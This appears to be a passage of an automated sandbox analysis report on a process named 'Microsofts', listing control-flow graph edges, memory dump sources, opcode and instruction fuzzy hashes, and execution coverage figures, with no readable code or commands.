4b964ce-4b964d2 2411->2419 2414 4b964ec-4b964f0 2412->2414 2416 4b96509-4b9650d 2414->2416 2417 4b964f2-4b96507 2414->2417 2420 4b9652b-4b96531 2416->2420 2421 4b9650f-4b96524 2416->2421 2417->2420 2418->2412 2419->2418 2421->2420 2425->2362 2426->2362 2427->2350 2428->2350 2429->2350 2430->2335 2431->2335 2433->2344 2434->2344 2435->2344
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Hbq$Hbq
                                                                                                                                                                                                                                      • API String ID: 0-4258043069
                                                                                                                                                                                                                                      • Opcode ID: fe722f325b17d164619956b61fc87b9c3fa71bc9df32ae08499ea46075632d37
                                                                                                                                                                                                                                      • Instruction ID: 8763a3b137e3c7d553eab86bd0ceaaa7a0abf643dfb1e519aa35fd97fb9dcd6a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe722f325b17d164619956b61fc87b9c3fa71bc9df32ae08499ea46075632d37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8651D5317042559FDF199F68D854BAE7BF2FF88304F1885AAE8458B291DB38EC12C790

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2680 245c76c 2681 245c82b-245c83c 2680->2681 2682 245c843-245c84c 2681->2682 2683 245c83e 2681->2683 2685 245c623-245c648 2682->2685 2686 245c852-245c865 2682->2686 2683->2682 2687 245c64f-245c686 2685->2687 2688 245c64a 2685->2688 2689 245c867 2686->2689 2690 245c86c-245c887 2686->2690 2699 245c68d-245c6bf 2687->2699 2700 245c688 2687->2700 2688->2687 2689->2690 2691 245c88e-245c8a2 2690->2691 2692 245c889 2690->2692 2695 245c8a4 2691->2695 2696 245c8a9-245c8bf LdrInitializeThunk 2691->2696 2692->2691 2695->2696 2698 245c8c1-245c9bf 2696->2698 2703 245c9c7-245c9d1 2698->2703 2704 245c9c1-245c9c6 call 2455ca8 2698->2704 2705 245c6c1-245c6e6 2699->2705 2706 245c723-245c736 2699->2706 2700->2699 2704->2703 2708 245c6ed-245c71b 2705->2708 2709 245c6e8 2705->2709 2711 245c73d-245c762 2706->2711 2712 245c738 2706->2712 2708->2706 2709->2708 2715 245c764-245c765 2711->2715 2716 245c771-245c7a9 2711->2716 2712->2711 2715->2686 2717 245c7b0-245c811 call 245c168 2716->2717 2718 245c7ab 2716->2718 2724 245c813 2717->2724 2725 245c818-245c82a 2717->2725 2718->2717 2724->2725 2725->2681
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 0245C8AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2957831520.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_2450000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 1d5a5e1226fbf66eab5f5a10659d96e27ad82b62354cbb04da52cd0564281340
                                                                                                                                                                                                                                      • Instruction ID: e28cb8e6ca45b5e0fa68d0e8e5c72cabbe1c976557f74a4688c92b913b1dd869
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5a5e1226fbf66eab5f5a10659d96e27ad82b62354cbb04da52cd0564281340
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D117CB4E012289FDB04DFA9D4C4AADBBB5FB88305F54D527EC44E7242DB74A981CB60
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d8cq
                                                                                                                                                                                                                                      • API String ID: 0-3601494702
                                                                                                                                                                                                                                      • Opcode ID: e9aa122fb3c8aa5aabfff150141b1687af89bb08ea96057a455e742754c019b4
                                                                                                                                                                                                                                      • Instruction ID: 22bf146896e79b216557287556d4088f37cf3dead623340317a825bca5d5b0ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9aa122fb3c8aa5aabfff150141b1687af89bb08ea96057a455e742754c019b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B641EF353406008FDB299B39D494A6E7BE6EF85310B1548BDE146CB7B1EB21EC06C790
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                                                                                      • Opcode ID: 9e798169d96b2ea24385156f809c6bf38f392d7a4f157a00a957d341e1e57fbc
                                                                                                                                                                                                                                      • Instruction ID: bbdee5c4312b1d8758b97ba4586d32ce575395b5c1c3bafb1f3c78c61a267b76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e798169d96b2ea24385156f809c6bf38f392d7a4f157a00a957d341e1e57fbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 624135756141159FCF15AF28D948AAE3BF2EF49311F1000AAF9068B3A1DB75ED42DBA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                                                                                      • Opcode ID: 734c28c31a2aa86c1d36610d6839469cc33ddd64930efff2d1fea28d9343df67
                                                                                                                                                                                                                                      • Instruction ID: 53eb7b6eb73e6945fa133bd6f2af67b7ef4795731d7e51934ab1ed4046363421
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 734c28c31a2aa86c1d36610d6839469cc33ddd64930efff2d1fea28d9343df67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7621F9353181458BCF15EE6AD880ABB7BE6EF87310B1488BAE501CB258EB74FC41D760
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d8cq
                                                                                                                                                                                                                                      • API String ID: 0-3601494702
                                                                                                                                                                                                                                      • Opcode ID: 59d9d65e2c1a07522c9f15ff9c962abb2b2affa14e5c3bc7d9d69c7bfd9c737b
                                                                                                                                                                                                                                      • Instruction ID: 1b814c18414973094c88ff1f324cd26c5f7ece75d8c4ef01dfc8da6e84a9b8c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59d9d65e2c1a07522c9f15ff9c962abb2b2affa14e5c3bc7d9d69c7bfd9c737b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF119E32640B414FCB369F2DC554B6EBBE6EFC0314F0589ADD0968B676EB60E8498781
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 367de908750255bf10ec61b27661d43955c2b718962480e337e6b1bdef0bb374
                                                                                                                                                                                                                                      • Instruction ID: aea413aa530d01f22d0f24450ec579a71846e98bd4995dcd29c8a59ab1be1cfb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 367de908750255bf10ec61b27661d43955c2b718962480e337e6b1bdef0bb374
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A471BF347052118FCB199F79D59462E7BE6EBC9300B1884BAE906CB395DF34EC46CB91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3cfce301903034b8efd5d9fa4ba004ff0341c30febbfe54015e2bc43bf2d9e25
                                                                                                                                                                                                                                      • Instruction ID: b5ad0b412f6796cb24aade1b7e37b4ca92d9c780f66ff357c491d0c923f107dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cfce301903034b8efd5d9fa4ba004ff0341c30febbfe54015e2bc43bf2d9e25
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE516D317241119FCB14EF39D89896A7BE6FF8A35431588FAE416CB262EB31EC05DB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ef7150b75e8a12d58ce106eb21e9641eed58f7b69feed788e699cc8cb1f34a0b
                                                                                                                                                                                                                                      • Instruction ID: 0b608b213229d4c3afca4ba2f8a349c21ce18abf7e7a5e1300a3c604ef93e5a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef7150b75e8a12d58ce106eb21e9641eed58f7b69feed788e699cc8cb1f34a0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A881B074E412289FDB65DF29D990BDDBBB2BB89300F1080EAD819A7254DB715E86CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7f59d01087e04b25a26286c5d7b0a9c63e6f9000840f4bdfb4bd62646868dba9
                                                                                                                                                                                                                                      • Instruction ID: c2cda897fb29f62e1898af44aafd855dbcf3778217217b71c91f460ea919976c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f59d01087e04b25a26286c5d7b0a9c63e6f9000840f4bdfb4bd62646868dba9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D414331E002099BDF19DFA5C890AEEBBF5EF89710F2485A9E405B7240DB70BD46CB91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8cff94abf760ac6ac152934d94aa9b83dd4549ce956606fecf2282b38b26808d
                                                                                                                                                                                                                                      • Instruction ID: 3be0c14287aeeb73a0b9d7aa165559755c6887cd5a1adc73da934d4dd92e9b30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cff94abf760ac6ac152934d94aa9b83dd4549ce956606fecf2282b38b26808d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88412932705249AFCF169F64D854AAF3BB2EF88310F00846AFC158B295DB39DD16DB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a287c20a3b1b14504b0abe502dd1e5d2807e38361bcd53ee87876db580db40db
                                                                                                                                                                                                                                      • Instruction ID: 1ff2880c40fb0c1f1442be80abee25c43eec14c8703318de24ffe258a5f366fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a287c20a3b1b14504b0abe502dd1e5d2807e38361bcd53ee87876db580db40db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F621E2367242004BDF287A36949467E26D7EFC6784B2480BAD406CF395EB39DC42D391
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2955283032.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_a1d000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4cc8ad7ac6f5a47f2d06e293336497f2e9cf1641ea2d3543ee56d42bd618596e
                                                                                                                                                                                                                                      • Instruction ID: 74ec1c745e7a1aef060e96b97f147ffe1f3d4d3bf368c49334bc7c28b45c46b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cc8ad7ac6f5a47f2d06e293336497f2e9cf1641ea2d3543ee56d42bd618596e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD217C7550D3C49FCB03CB24D994711BF71AB46314F28C5DBD8898F2A3C23A985ACB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2955283032.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_a1d000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 908a2bdd839847ecc29eea7ee7ab2cfd478bc48b6ec59b02642157d6afa92b50
                                                                                                                                                                                                                                      • Instruction ID: 1db4c4d579d7ec545d5032044d1c6454727c24341d1dd9c764ff06fe32991d62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908a2bdd839847ecc29eea7ee7ab2cfd478bc48b6ec59b02642157d6afa92b50
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35210475504204EFCB14DF14DAC0B66BBA5FB88314F24C66DD80A4B296C33AD887CA62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4158edfa05daca37467377c18a54ee933f842fa53a639a76e1f891b26be58c30
                                                                                                                                                                                                                                      • Instruction ID: 505d67fba630aea100e98a0049173bf8627a6e2f78ad1c7ccd7997730f1a594b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4158edfa05daca37467377c18a54ee933f842fa53a639a76e1f891b26be58c30
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811E6327082949FDF066F7858202AE3FA7EFC5250B0448AAE445DB392CF348D06C3A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 084520ad79aceb01327dc7aebe4ec4b3717934abaf49dadea0f9a317cb0403af
                                                                                                                                                                                                                                      • Instruction ID: 7d92325bf1551f2ace21abaad11de1379a9011b9ffd67b3a13c58a92f2b6ae13
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 084520ad79aceb01327dc7aebe4ec4b3717934abaf49dadea0f9a317cb0403af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90116776800249EFDB10DF99D804BDEBFF4EB48320F148469E558A7251C335A990DFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e9621f565ed8d8869dbce1b10be0049781f144a52cc36a28e44a07051ded23ad
                                                                                                                                                                                                                                      • Instruction ID: 008f1c2972bf49c2d7d51d68b11a8f3afa235b10b5ef3ec7317eba6051c65537
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9621f565ed8d8869dbce1b10be0049781f144a52cc36a28e44a07051ded23ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3110634E0054A8FEF00DFBCE854BAEBBF5AB48311F0195A1A918EB345EB30A9418B51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 27d9d9a1bd7491afe74a150fe812e8987771496761f447cd6a2ea11ac59bc694
                                                                                                                                                                                                                                      • Instruction ID: b7fb3d5eb13d02e75786ef9b307a4a365fbd6f3d30f93935b1dbe5321bc94190
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27d9d9a1bd7491afe74a150fe812e8987771496761f447cd6a2ea11ac59bc694
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21117976800249DFDB10CF99D944BDEBFF4EF48320F148499E554A7251C335A594DFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b3975b2c36f54bf7719273d2d991b4e4393f2d4c12752a2f117f7aed14f2ebcc
                                                                                                                                                                                                                                      • Instruction ID: 2cecc415471d7a23977bb96eb69a76bfc5e49c677dacbdcb0765992a04f6ed40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3975b2c36f54bf7719273d2d991b4e4393f2d4c12752a2f117f7aed14f2ebcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC01D6337051186BDF059F699810AAF3BDBDBC9750F18807AF505D7280DA71DD129BA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 57d4eef6005b39cbfd58689aefcb3fdb182f1e211ca15a16b98973f9eea7a5f3
                                                                                                                                                                                                                                      • Instruction ID: 459af7aaa63461ead92a18f5c2a9e4985a354a2ad9ac4d699ef3f703232b150f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57d4eef6005b39cbfd58689aefcb3fdb182f1e211ca15a16b98973f9eea7a5f3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A01F273A04148AFEB028E659855ADB3BA6EB85350B1880AAF500C7181D6368D12CB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3ba0b8d44030ec4cd1a737e6bba4d03b66ed8fe219668d37236f7ff0d757e861
                                                                                                                                                                                                                                      • Instruction ID: 18e5f2bb58d03e4ff60eb226ee2dc3424b817da8547e0919822c44ea4af3d5a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ba0b8d44030ec4cd1a737e6bba4d03b66ed8fe219668d37236f7ff0d757e861
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7ED0C2366052484FCB06AB74ED954853B27E9C02003068296D0050A5AFDE74198F8350
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ec5bbb13e75838faac1e1d61e214eea2073205d9ea8aaf7735f05baca9959a5d
                                                                                                                                                                                                                                      • Instruction ID: d2eaf648837affd546beb6ec7ccdf1ec52ecc5dd898ea1ebe7ca361478fc8ef3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec5bbb13e75838faac1e1d61e214eea2073205d9ea8aaf7735f05baca9959a5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D0673AB40018DFCB049F9DE8508DDF7B6FB98221B148516E915A3265CA319925DB64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 648f6f6837386ac8a5cc52ed8cf9b2c5832e0fb27fa8f5123ff1e65ef7c780ab
                                                                                                                                                                                                                                      • Instruction ID: d423ad6030f64e114e5509c06a1cf7dd70fe05620d3325a4b57d895c0c0ff617
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 648f6f6837386ac8a5cc52ed8cf9b2c5832e0fb27fa8f5123ff1e65ef7c780ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC012340443084EC901F765F945956775EE6C03007818621A409062AEDF745D8E5690

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:3.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:79
                                                                                                                                                                                                                                      Total number of Limit Nodes:6
